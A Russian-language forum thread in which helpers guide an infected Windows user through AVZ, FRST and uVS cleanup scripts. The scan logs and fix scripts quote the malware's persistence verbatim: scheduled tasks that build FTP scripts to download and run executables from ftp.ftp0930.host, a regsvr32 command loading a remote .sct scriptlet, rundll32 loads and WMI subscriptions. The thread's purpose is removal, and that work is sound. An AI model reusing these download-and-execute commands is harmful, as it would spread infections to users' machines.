Смотрите видео ниже, чтобы узнать, как установить наш сайт в качестве веб-приложения на домашнем экране.
Примечание: Эта возможность может быть недоступна в некоторых браузерах.
begin
SetupAVZ('QrPWD=malware');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
QuarantineFile('c:\windows\debug\item.dat>', '');
QuarantineFile('C:\Windows\debug\lsmose.exe', '');
QuarantineFile('c:\windows\debug\ok.dat', '');
QuarantineFile('c:\windows\help\lsmosee.exe', '');
QuarantineFile('c:\windows\mc\mcmc.exe', '');
QuarantineFile('c:\windows\temp\conhost.exe', '');
QuarantineFile('c:\windows\update.exe', '');
DeleteFile('c:\windows\debug\item.dat', '64');
DeleteFile('C:\Windows\debug\lsmose.exe', '32');
DeleteFile('c:\windows\debug\ok.dat', '64');
DeleteFile('c:\windows\help\lsmosee.exe', '64');
DeleteFile('c:\windows\temp\conhost.exe', '32');
DeleteFile('c:\windows\update.exe', '64');
DeleteSchedulerTask('Mysa');
DeleteSchedulerTask('Mysa1');
DeleteSchedulerTask('Mysa2');
DeleteSchedulerTask('Mysa3');
DeleteSchedulerTask('ok');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start', 'x32');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start', 'x64');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start1', 'x64');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
RebootWindows(true);
end.
O21 - HKLM\..\ShellIconOverlayIdentifiers\ YndCase0Sync: (no name) - {63D48440-63AB-44D0-B323-4731DFCDE9E9} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ YndCase1Modified: (no name) - {7E7DC279-E6BE-4D57-9DEC-14FA0339DBC0} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ YndCase2Error: (no name) - {FB2FE984-05F5-4512-9D9B-69D3DE61F6D9} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ YndCase3Shared: (no name) - {AF8D197E-7022-4c3d-BD88-68AD35C9C169} - (no file)
Простите, в скрипте содержаться ошибки синтаксиса, не могли бы Вы перепроверить скрипт? Спасибо за Ваше внимание.Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Компьютер перезагрузится.Код:begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; QuarantineFile('c:\windows\debug\ok.dat',''); QuarantineFile('c:\windows\help\lsmosee.exe',''); QuarantineFile('c:\windows\debug\item.dat>',''); QuarantineFile('c:\windows\update.exe',''); QuarantineFile('C:\Windows\mc\mcmc.exe',''); QuarantineFile('c:\windows\mc\mcmc.exe',''); QuarantineFile('C:\Windows\debug\lsmose.exe',''); QuarantineFile('c:\windows\temp\conhost.exe',''); DeleteFile('c:\windows\temp\conhost.exe','32'); DeleteFile('C:\Windows\debug\lsmose.exe','32'); DeleteFile('c:\windows\update.exe','64'); DeleteFile('c:\windows\debug\item.dat','64') DeleteFile('c:\windows\update.exe','64'); DeleteFile('c:\windows\debug\item.dat','64'); DeleteFile('c:\windows\help\lsmosee.exe','64'); DeleteFile('c:\windows\debug\ok.dat','64'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x64'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start1','x64'); DeleteSchedulerTask('Mysa'); DeleteSchedulerTask('Mysa1'); DeleteSchedulerTask('Mysa2'); DeleteSchedulerTask('Mysa3'); DeleteSchedulerTask('ok'); BC_Activate; ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); BC_ImportALL; RebootWindows(true); end.
После перезагрузки, выполните такой скрипт:
Код:begin DeleteFile(GetAVZDirectory+'quarantine.7z'); ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false); end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.
"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:O21 - HKLM\..\ShellIconOverlayIdentifiers\ YndCase0Sync: (no name) - {63D48440-63AB-44D0-B323-4731DFCDE9E9} - (no file) O21 - HKLM\..\ShellIconOverlayIdentifiers\ YndCase1Modified: (no name) - {7E7DC279-E6BE-4D57-9DEC-14FA0339DBC0} - (no file) O21 - HKLM\..\ShellIconOverlayIdentifiers\ YndCase2Error: (no name) - {FB2FE984-05F5-4512-9D9B-69D3DE61F6D9} - (no file) O21 - HKLM\..\ShellIconOverlayIdentifiers\ YndCase3Shared: (no name) - {AF8D197E-7022-4c3d-BD88-68AD35C9C169} - (no file)
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
Я решил проблему с ошибкой в скрипте.Простите, в скрипте содержаться ошибки синтаксиса, не могли бы Вы перепроверить скрипт? Спасибо за Ваше внимание.
Нет.Да, пропустил ";"
Лог FRST собирали до выполнения скрипта?
Start::
CreateRestorePoint:
Folder:c:\windows\debug
(TODO: <公司名>) C:\Windows\Temp\conhost.exe
(TODO: <公司名>) C:\Windows\debug\lsmose.exe
C:\Windows\Temp\conhost.exe
C:\Windows\debug\lsmose.exe
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp0930.host:280/v.sct scrobj.dll
HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {2d6b9cdc-342d-11e8-b584-c0f8dac57fd6} - F:\VZAccess_Manager.exe /z detect
HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {79bbf205-2aa9-11e8-9efc-c0f8dac57fd6} - F:\VZAccess_Manager.exe /z detect
HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {79bbf207-2aa9-11e8-9efc-c0f8dac57fd6} - F:\VZAccess_Manager.exe /z detect
HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {b78188f9-2dcf-11e8-8a8f-c0f8dac57fd6} - F:\VZAccess_Manager.exe /z detect
HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {e6f680a7-e8e1-11e8-9744-c0f8dac57fd6} - F:\HiSuiteDownLoader.exe
HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {f61b0760-2b73-11e8-bd83-c0f8dac57fd6} - F:\VZAccess_Manager.exe /z detect
HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {f61b077a-2b73-11e8-bd83-c0f8dac57fd6} - F:\VZAccess_Manager.exe /z detect
2018-11-21 22:30 - 2018-11-21 22:30 - 000003520 _____ C:\Windows\System32\Tasks\Mysa
2018-11-21 22:30 - 2018-11-21 22:30 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
2018-11-21 22:30 - 2018-11-21 22:30 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
2018-11-21 22:30 - 2018-11-21 22:30 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2018-11-21 22:30 - 2018-11-21 22:30 - 000003186 _____ C:\Windows\System32\Tasks\ok
Task: {4BC0A293-74B8-490F-B063-D4BA60FBD767} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {50F59FA9-B63C-4520-9A65-475E6DB3A91D} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {89048910-C333-4EA1-B7A5-6D00F22F711D} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {99885622-C67E-468C-A914-866D7E537B67} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {A85D223D-6FC4-40A4-995F-C776BABE475E} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
c:\windows\debug\ok.dat
c:\windows\debug\item.dat
c:\windows\debug\item.dat
c:\windows\update.exe
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"fuckyoumm2_filter\": <==== ATTENTION
WMI:subscription\__TimerInstruction->fuckyoumm2_itimer: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm2_filter: <==== ATTENTION
EmptyTemp:
Reboot:
End::
В файл hosts я ничего не добавлял.В файл hosts сами добавляли?
O1 - Hosts: 27.255.77.37 www.pubyun.com
Компьютер будет перезагружен автоматически.
- Отключите до перезагрузки антивирус.
- Выделите следующий код:
Код:Start:: CreateRestorePoint: Folder:c:\windows\debug (TODO: <公司名>) C:\Windows\Temp\conhost.exe (TODO: <公司名>) C:\Windows\debug\lsmose.exe C:\Windows\Temp\conhost.exe C:\Windows\debug\lsmose.exe HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp0930.host:280/v.sct scrobj.dll HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {2d6b9cdc-342d-11e8-b584-c0f8dac57fd6} - F:\VZAccess_Manager.exe /z detect HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {79bbf205-2aa9-11e8-9efc-c0f8dac57fd6} - F:\VZAccess_Manager.exe /z detect HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {79bbf207-2aa9-11e8-9efc-c0f8dac57fd6} - F:\VZAccess_Manager.exe /z detect HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {b78188f9-2dcf-11e8-8a8f-c0f8dac57fd6} - F:\VZAccess_Manager.exe /z detect HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {e6f680a7-e8e1-11e8-9744-c0f8dac57fd6} - F:\HiSuiteDownLoader.exe HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {f61b0760-2b73-11e8-bd83-c0f8dac57fd6} - F:\VZAccess_Manager.exe /z detect HKU\S-1-5-21-466914110-2557974605-315394388-1000\...\MountPoints2: {f61b077a-2b73-11e8-bd83-c0f8dac57fd6} - F:\VZAccess_Manager.exe /z detect 2018-11-21 22:30 - 2018-11-21 22:30 - 000003520 _____ C:\Windows\System32\Tasks\Mysa 2018-11-21 22:30 - 2018-11-21 22:30 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3 2018-11-21 22:30 - 2018-11-21 22:30 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2 2018-11-21 22:30 - 2018-11-21 22:30 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1 2018-11-21 22:30 - 2018-11-21 22:30 - 000003186 _____ C:\Windows\System32\Tasks\ok Task: {4BC0A293-74B8-490F-B063-D4BA60FBD767} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {50F59FA9-B63C-4520-9A65-475E6DB3A91D} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION Task: {89048910-C333-4EA1-B7A5-6D00F22F711D} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION Task: {99885622-C67E-468C-A914-866D7E537B67} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {A85D223D-6FC4-40A4-995F-C776BABE475E} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa c:\windows\debug\ok.dat c:\windows\debug\item.dat c:\windows\debug\item.dat c:\windows\update.exe WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"fuckyoumm2_filter\": <==== ATTENTION WMI:subscription\__TimerInstruction->fuckyoumm2_itimer: <==== ATTENTION WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer: <==== ATTENTION WMI:subscription\__EventFilter->fuckyoumm2_filter: <==== ATTENTION EmptyTemp: Reboot: End::
- Скопируйте выделенный текст (правой кнопкой - Копировать).
- Запустите FRST (FRST64) от имени администратора.
- Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Подробнее читайте в этом руководстве.
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
O1 - Hosts: 27.255.77.37 www.pubyun.com
сделал этоКод:O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com O1 - Hosts: 27.255.77.37 www.pubyun.com
Start::
CreateRestorePoint:
c:\windows\debug\
Reboot:
End::
Там нет никаких паролей.c:\windows\debug\PASSWD.LOG - проверьте содержимое, нет ли там ваших паролей.
Компьютер будет перезагружен автоматически.
- Отключите до перезагрузки антивирус.
- Выделите следующий код:
Код:Start:: CreateRestorePoint: c:\windows\debug\ Reboot: End::
- Скопируйте выделенный текст (правой кнопкой - Копировать).
- Запустите FRST (FRST64) от имени администратора.
- Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Подробнее читайте в этом руководстве.
ОсталасьЧто с проблемой?
Скачайте AutorunsVTchecker. Распакуйте и запустите. Не дожидаясь окончания сканирования,
Подробнее читайте в руководстве Как подготовить лог UVS.
- Скачайте Universal Virus Sniffer (uVS)
- Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
- Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
!!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.- Дождитесь окончания работы программы и прикрепите лог к посту в теме.
!!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".
;uVS v4.1 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
BREG
bl BF69865A3ACD3379B0A8D870CCD43618 113
zoo %SystemRoot%\WEB\N.VBS
delall %SystemRoot%\WEB\N.VBS
delref A.EXE
delref %SystemRoot%\DEBUG\ITEM.DAT
delref PS&C:\WINDOWS\HELP\LSMOSEE.EXE
delref %SystemRoot%\DEBUG\OK.DAT
delref S.DAT
delref S.RAR
delref S&C:\WINDOWS\UPDATE.EXE
zoo %SystemRoot%\INF\MSIEF.EXE
bl 5CA04ED0CEB72994A57B264427DB1671 302750
addsgn 1A22739A5583C28CF42B95BCAC695105D7FFFE044A08F63C83C3C53F31D271C7E294A25F3E92DC4DE38FC79F81173DE33EDF2B27DE36E6D3587F2FDE2FA8178C 8 Trojan.BAT.Starter.ly [Kaspersky] 7
chklst
delvir
czoo
restart